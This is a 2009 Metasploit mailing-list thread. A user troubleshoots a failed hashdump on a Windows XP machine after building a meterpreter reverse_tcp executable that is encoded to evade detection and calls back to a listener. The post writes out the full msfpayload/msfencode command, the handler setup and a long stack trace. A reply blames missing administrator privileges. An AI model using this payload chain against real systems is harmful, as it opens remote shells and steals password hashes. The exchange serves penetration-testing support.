Metasploit mailing list archives
Problem with meterpreter, priv, hashdump, etc.
From: wullie19 at ntlworld.com (rogue)
Date: Sat, 18 Apr 2009 22:00:27 +0100
Hi there, I know you said you started msfconsole as root but to dump the hashes the meterpreter has to be running with the appropriate privileges. Try right clicking it and run as administrator and see if that helps. -rogue
Hi all, I have used msfpayload to create a .exe to connect back to me successfully in the past, and find it to be a great tool. However, today I seem to be hitting the wall when I try to get a hashdump out of the remote system. Here's the scenario: I should add, this is all done with a fresh local copy from the subversion trunk, revision 6490, and with ~/.msf3 removed entirely and refreshed by a new call to msfconsole before starting. I created an executable with the following command: ./msfpayload windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=443 R | ./msfencode -e x86/shikata_ga_nai -c 4 -t exe -o rv_443.exe I started msfconsole (as root) with an rc file: use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST x.x.x.x set LPORT 443 exploit My session started just fine: resource> use exploit/multi/handler resource> set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp resource> set LHOST x.x.x.x LHOST => x.x.x.x resource> set LPORT 443 LPORT => 443 resource> exploit [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Starting the payload handler... On the remote system, I started the rv_443.exe and saw the connection back to my msfconsole session: [*] Transmitting intermediate stager for over-sized stage...(191 bytes) [*] Sending stage (2650 bytes) [*] Sleeping before handling stage... [*] Uploading DLL (75787 bytes)... [*] Upload completed. [*] Meterpreter session 1 opened (x.x.x.x:443 -> y.y.y.y:1210) And, I was able to get info back from the remote system, as expected. meterpreter > sysinfo Computer: sanitized for the clients protection! OS : Windows XP (Build 2600, Service Pack 3). meterpreter > ls Listing: C:\DOKUME~1\someuser\LOKALE~1\Temp\FFC0EAB.tmp ===================================================== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 . 40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 .. etc. etc. etc. However, when I tried to use priv and then execute hashdump, or any other command thereafter, I got errors. I got no errors with 'ls' just after 'use priv', but I did get errors with 'ls' after 'hashdump'. meterpreter > hashdump [-] Error running command hashdump: wrong number of arguments (0 for 1) /home/wdawson/Software/metasploit/framework3/lib/rex/post/meterpreter/packe t_dispatcher.rb:72:in `initialize'/home/wdawson/Software/metasploit/framework3/lib/rex/post/meter preter/packet_dispatcher.rb:72:in `exception'/home/wdawson/Software/metasploit/framework3/lib/rex/post/meterp reter/packet_dispatcher.rb:72:in `raise'/home/wdawson/Software/metasploit/framework3/lib/rex/post/meterprete r/packet_dispatcher.rb:72:in `send_request'/home/wdawson/Software/metasploit/framework3/lib/rex/post/met erpreter/extensions/priv/priv.rb:44:in `sam_hashes'/home/wdawson/Software/metasploit/framework3/lib/rex/post/meter preter/ui/console/command_dispatcher/priv/passwd.rb:39:in `cmd_hashdump'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/ dispatcher_shell.rb:234:in `send'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatch er_shell.rb:234:in `run_command'/home/wdawson/Software/metasploit/framework3/lib/rex/post/mete rpreter/ui/console.rb:94:in `run_command'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/d ispatcher_shell.rb:196:in `run_single'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/di spatcher_shell.rb:191:in `each'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatch er_shell.rb:191:in `run_single'/home/wdawson/Software/metasploit/framework3/lib/rex/post/meter preter/ui/console.rb:60:in `interact'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/shel l.rb:123:in `call'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/shell.rb :123:in `run'/home/wdawson/Software/metasploit/framework3/lib/rex/post/meterpreter/ ui/console.rb:58:in `interact'/home/wdawson/Software/metasploit/framework3/lib/msf/base/session s/meterpreter.rb:181:in `_interact'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/interact ive.rb:48:in `interact'/home/wdawson/Software/metasploit/framework3/lib/msf/ui/console/c ommand_dispatcher/core.rb:997:in `cmd_sessions'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/ dispatcher_shell.rb:234:in `send'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatch er_shell.rb:234:in `run_command'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/d ispatcher_shell.rb:196:in `run_single'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/di spatcher_shell.rb:191:in `each'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatch er_shell.rb:191:in `run_single'/home/wdawson/Software/metasploit/framework3/lib/msf/ui/console /command_dispatcher/exploit.rb:143:in `cmd_exploit'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/d ispatcher_shell.rb:234:in `send'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatch er_shell.rb:234:in `run_command'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/d ispatcher_shell.rb:196:in `run_single'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/di spatcher_shell.rb:191:in `each'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatch er_shell.rb:191:in `run_single'/home/wdawson/Software/metasploit/framework3/lib/msf/ui/console /driver.rb:190:in `load_resource'/home/wdawson/Software/metasploit/framework3/lib/msf/ui/cons ole/driver.rb:185:in `each_line'/home/wdawson/Software/metasploit/framework3/lib/msf/ui/console/ driver.rb:185:in `load_resource'/home/wdawson/Software/metasploit/framework3/lib/msf/ui/cons ole/driver.rb:103:in `initialize'./msfconsole:82:in `new'./msfconsole:82 Would this be at all due to the fact that the remote system is (seemingly) using a German locale, or is it due to some other factor? Thanks in advance for any suggestions or insight.
Current thread:
- problem Payload options (php/reverse_php) robert (Apr 18)
- problem Payload options (php/reverse_php) Enrico (Apr 18)
- Problem with meterpreter, priv, hashdump, etc. wfdawson at bellsouth.net (Apr 18)
- Problem with meterpreter, priv, hashdump, etc. rogue (Apr 18)
- Problem with meterpreter, priv, hashdump, etc. wfdawson at bellsouth.net (Apr 18)
- Problem with meterpreter, priv, hashdump, etc. wfdawson at bellsouth.net (Apr 18)
- problem Payload options (php/reverse_php) Enrico (Apr 18)
- problem Payload options (php/reverse_php) Edward Bjarte Fjellskål (Apr 18)